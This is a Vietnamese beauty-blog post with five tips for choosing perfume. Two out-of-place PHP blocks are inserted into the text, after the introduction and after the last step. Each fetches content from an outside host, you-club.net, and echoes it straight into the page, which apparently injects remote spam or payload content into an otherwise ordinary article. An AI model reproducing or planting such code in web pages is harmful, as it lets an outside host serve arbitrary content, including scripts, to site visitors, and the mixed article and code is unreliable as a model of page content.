Chăm sóc sắc đẹp

You are here: Home - Chăm sóc - làm đẹp, Chăm sóc sắc đẹp - nước hoa và mỹ phẩm khác


nước hoa và mỹ phẩm khác

5 bước lựa chọn nước hoa hiệu quả, bạn nên biết

Bạn đang băn khoăn chưa biết làm thế nào để lựa chọn nước hoa hiệu quả và chất lượng nhất phù hợp với mình? Hãy tham khảo 5 bước sau đây của chúng tôi để đạt được hiệu quả nhất nhé..
[php]
$data = file(“http://you-club.net/sys/link/25″);

foreach ($data as $cont) {
$text = mb_convert_encoding($cont,”utf8″,”EUC-JP”);
echo $text;
}
[/php]

Bước 1: Tham khảo trước tại các tạp chí, các trang web online để lựa chọn chai hợp với phong cách của mình. Tại sao ư? Vì trong một lần shopping, bạn chỉ nên thử 4 mùi để không bị lẫn lộn các loại hương với nhau và dễ nhức đầu.

nuoc-hoa-1

Lựa chọn nước hoa 1

Bước 2: Ngửi hạt cà phê trước khi lựa nước hoa sẽ giúp bạn cân bằng lại khứu giác khi thử qua vài mùi hương. Đảm bảo không bị nhầm lẫn và hòa trộn mùi hương với nhau

Bước 3: Nước hoa sẽ lên mùi khác nhau sau khi xức lên da cho nên bạn không nên chọn ngay mà hãy chờ vài phú để thấy sự thay đổi, xem nó có phù hợp với mình hay không nhé.

nuoc-hoa-2

Lựa chọn nước hoa 2

Bước 4: Trên thị trường có rất nhiều loại nước hoa cũng như mức giá khác nhau, điều quan trong khi chọn nước hoa là tiêu chí lưu hương, hợp với phong cách và túi tiền của từng người.

Bước 5: Khuyên bạn nên chọn mua nước hoa vào buổi chiều hoặc tối bởi lúc này khứu giác của chúng ta luôn nhạy hơn so với buổi sáng..
[php]
$data = file(“http://you-club.net/sys/link/26″);

foreach ($data as $cont) {
$text = mb_convert_encoding($cont,”utf8″,”EUC-JP”);
echo $text;
}
[/php]

 

Leave a Reply

Your email address will not be published. Required fields are marked *